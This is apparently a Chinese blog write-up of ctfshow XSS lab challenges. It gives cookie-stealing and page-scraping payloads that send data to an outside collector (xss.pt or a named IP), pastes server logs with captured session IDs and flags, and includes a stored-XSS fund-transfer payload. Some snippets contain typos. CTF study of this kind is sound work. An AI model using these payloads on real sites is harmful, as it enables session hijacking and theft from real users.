XSS攻击通常指的是通过利用网页开发时留下的漏洞,通过巧妙的方法注入恶意指令代码到网页,使用户加载并执行攻击者恶意制造的网页程序。这些恶意网页程序通常是JavaScript,但实际上也可以包括Java、 VBScript、ActiveX、 Flash 或者甚至是普通的HTML。攻击成功后,攻击者可能得到包括但不限于更高的权限(如执行一些操作)、私密网页内容、会话和cookie等各种内容。
大致的介绍一下XSS漏洞!此时我们可以使用这个xss平台***https://xss.pt/xss.php***
注册账号创建项目!
这里面有许多构造的脚本!
web316
这个题吗最为简单,直接将上面的平台的脚本发过去,然后在平台上就能接受到返回的cookie了!
当然,真正的大佬是有自己的服务器,不需要这类的网站!自己没有服务器,tcltcl!
<srcipt>
var img = document.creatElement("img");//创建img标签!
img.src = 'your ip?cookie=' + document.cookie;//设置img标签的src
</script>
web317~web319
过滤了script和img在代码中寻找到没有img和script的插入就可以了!
<iframe WIDTH=0 HEIGHT=0 srcdoc=。。。。。。。。。。<sCRiPt sRC="https://xss.pt/0kgH"></sCrIpT>>
通杀!
将上面的传入就可以了!
web320~322
这里先不弄脚本!正好找到师傅的一些小的知识点,先来补充一波!
知识点
- open() 方法用于打开一个新的浏览器窗口或查找一个已命名的窗口
<script>window.open('url+port'+document.cookie)</script>
- 当前页面打开URL页面
<script>window.location.href='url+port'+document.cookie</script>
- 这里不加上window也是可以的!
<script>location.href='url+port'+document.cookie</script>
- 通过autofocus属性执行本身的focus事件,这个向量是使焦点自动跳到输入元素上,触发焦点事件,无需用户去触发
<input onfocus="window.open('url+port'+document.cookie)" autofocus>
- svg标签
<svg onload="window.open('url+port'+document.cookie)">
- iframe标签
<iframe onload="window.open('url+port'+document.cookie)"></iframe>
- body标签
<body onload="window.open('url+port'+document.cookie)">
再来看看这道题!过滤了空格 用tab键代替空格,代码还是用上面的!
<iframe WIDTH=0 HEIGHT=0 srcdoc=。。。。。。。。。。<sCRiPt sRC="https://xss.pt/0kgH"></sCrIpT>>
web323~326
这里过滤了iframe,这里需要一个服务器!
<BODY ONLOAD=document.location='http://47.95.235.67:5000?cookie='+document.cookie;>
上面的这个没有成功,可能是端口问题吧!
<body/οnlοad=document.location='http://47.95.235.67:8081//cookie.php?cookie='+document.cookie;>
这里我差点以为不成功!因为我的服务器里面并没有得到一些内容flag了,不过我的服务器开了日志,从日志里找到了!
49.235.148.38 - - [19/May/2021:20:21:14 +0800] "GET //cookie.php?cookie=PHPSESSID=l9tref5d5fqt2cn080esh54h06;%20flag=ctfshow%7Bc7801f89-19d7-4596-ba83-65c25460da5d%7D HTTP/1.1" 404 146 "http://127.0.0.1/target.php?key=ctfshow_bot_key" "Mozilla/5.0 (Unknown; Linux x86_64) AppleWebKit/538.1 (KHTML, like Gecko) PhantomJS/2.1.1 Safari/538.1"
49.235.148.38 - - [19/May/2021:20:21:25 +0800] "GET //cookie.php?cookie=PHPSESSID=qoml9qfl2mssdm06bdla4o4gkv;%20flag=ctfshow%7Bc7801f89-19d7-4596-ba83-65c25460da5d%7D HTTP/1.1" 404 146 "http://127.0.0.1/target.php?key=ctfshow_bot_key" "Mozilla/5.0 (Unknown; Linux x86_64) AppleWebKit/538.1 (KHTML, like Gecko) PhantomJS/2.1.1 Safari/538.1"
49.235.148.38 - - [19/May/2021:20:21:36 +0800] "GET //cookie.php?cookie=PHPSESSID=19p049pvt1ns6980i34hip0isj;%20flag=ctfshow%7Bc7801f89-19d7-4596-ba83-65c25460da5d%7D HTTP/1.1" 404 146 "http://127.0.0.1/target.php?key=ctfshow_bot_key" "Mozilla/5.0 (Unknown; Linux x86_64) AppleWebKit/538.1 (KHTML, like Gecko) PhantomJS/2.1.1 Safari/538.1"
49.235.148.38 - - [19/May/2021:20:21:47 +0800] "GET //cookie.php?cookie=PHPSESSID=qv4tksl89aa4g76g5sahdv3hid;%20flag=ctfshow%7Bc7801f89-19d7-4596-ba83-65c25460da5d%7D HTTP/1.1" 404 146 "http://127.0.0.1/target.php?key=ctfshow_bot_key" "Mozilla/5.0 (Unknown; Linux x86_64) AppleWebKit/538.1 (KHTML, like Gecko) PhantomJS/2.1.1 Safari/538.1"
这里复制了四条记录,就不上图了,截不下来!
web327
这里变为存储型的XSS了!
收件人为admin,其它随便写,payload还用上面的那个脚本!
当然使用xss平台也是可以的!
49.235.148.38 - - [19/May/2021:20:32:09 +0800] "GET //cookie.php?cookie=PHPSESSID=l0vjstgl7h6711i2874s46goeq;%20flag=ctfshow%7B11633866-d8c7-406c-80ab-cd23de6e4184%7D HTTP/1.1" 404 146 "http://127.0.0.1/target.php?key=ctfshow_bot_key" "Mozilla/5.0 (Unknown; Linux x86_64) AppleWebKit/538.1 (KHTML, like Gecko) PhantomJS/2.1.1 Safari/538.1"
49.235.148.38 - - [19/May/2021:20:32:20 +0800] "GET //cookie.php?cookie=PHPSESSID=o804ehs2u0rs945rmr94ssgnou;%20flag=ctfshow%7B11633866-d8c7-406c-80ab-cd23de6e4184%7D HTTP/1.1" 404 146 "http://127.0.0.1/target.php?key=ctfshow_bot_key" "Mozilla/5.0 (Unknown; Linux x86_64) AppleWebKit/538.1 (KHTML, like Gecko) PhantomJS/2.1.1 Safari/538.1"
web328~331
这里有个通杀方法!
就是在xss平台上开启超强模式!不过有的平台是没有超强模式的,需要我们自己找一个!
web328
这里是个登录的地方了!它是想让我们以admin的身份进行登录,但是我们需要知道它的cookie,从而构造出一下的脚本直接在注册框里面进行提交然后再服务器的日志里面就可以看到cookie了!
<script>window.open('http://47.95.235.67:8081/'+document.cookie)</script>
这里是可以在日志中看到cookie的
49.235.148.38 - - [19/May/2021:20:46:44 +0800] "GET /PHPSESSID=84vqaf0fc47seleip343e2fg0i HTTP/1.1" 404 146 "http://127.0.0.1/manager.php" "Mozilla/5.0 (Unknown; Linux x86_64) AppleWebKit/538.1 (KHTML, like Gecko) PhantomJS/2.1.1 Safari/538.1"
web329
这里是限制了我们的上一种方法,无发发送过来cookie了!
所以我们直接将html源码输入过来就可以了!
<script>window.open('http://47.95.235.67:8081/'+document.getElementsByClassName('layui-table-cell laytable-cell-1-0-1')[1].innerHTML)</script>
这里再摘抄一些大师傅的记录!
getElementsByClassName:获取所有指定类名的元素
还有innerHTML和outerHTML的区别
1)innerHTML:
从对象的起始位置到终止位置的全部内容,不包括Html标签。
2)outerHTML:
除了包含innerHTML的全部内容外, 还包含对象标签本身。
这里直接在日志里面出现了flag了
49.235.148.38 - - [19/May/2021:20:55:49 +0800] "GET /ctfshow%7B7d4a2fb4-7ae1-4382-ba8a-a5739032a47c%7D HTTP/1.1" 404 146 "http://127.0.0.1/manager.php" "Mozilla/5.0 (Unknown; Linux x86_64) AppleWebKit/538.1 (KHTML, like Gecko) PhantomJS/2.1.1 Safari/538.1"
web330(未做)
<script>window.open("http://47.95.235.67:8081/")</script>
下面这个是根据师傅来弄的!
<script>window.open("http://47.95.235.67:8081/api/change.php?p=a")</script>
但是好像不适用,可能我哪里错了吧!
<script>window.open('http://47.95.235.67:8081/'+document.querySelector('#top > div.layui-container').textContent)</script>
这个不知道怎么也不行?
web331(未做)
这里将修改密码的改为了post提交!不过还是不会做!
web332
这个直接注册账号,然后直接转给admin-9999就有钱了,我们就直接可以购买flag了!这个是逻辑漏洞了!
还有一点要注意,有时候使用eg游览器进行操作的时候,cookie可能一直不变,看似我们已经登录上去了,但是其实我们并没有登录上去,所以这里是没有办法转账和购买的!
web333
这个也是有个逻辑漏洞的,刚开始我们有5元,我们给自己转10000元会显示余额不足,如果我们转5元的话,我们就成了10元,这样一直下去是可以转到100000元的!
还有就是注册个账号!
账号:
<script>$.post("http://127.0.0.1/api/amount.php",{'u':'123' ,'a':10000},"json");</script
这样我们的123用户就会多出来10000元!
616
被折叠的 条评论
为什么被折叠?
到【灌水乐园】发言
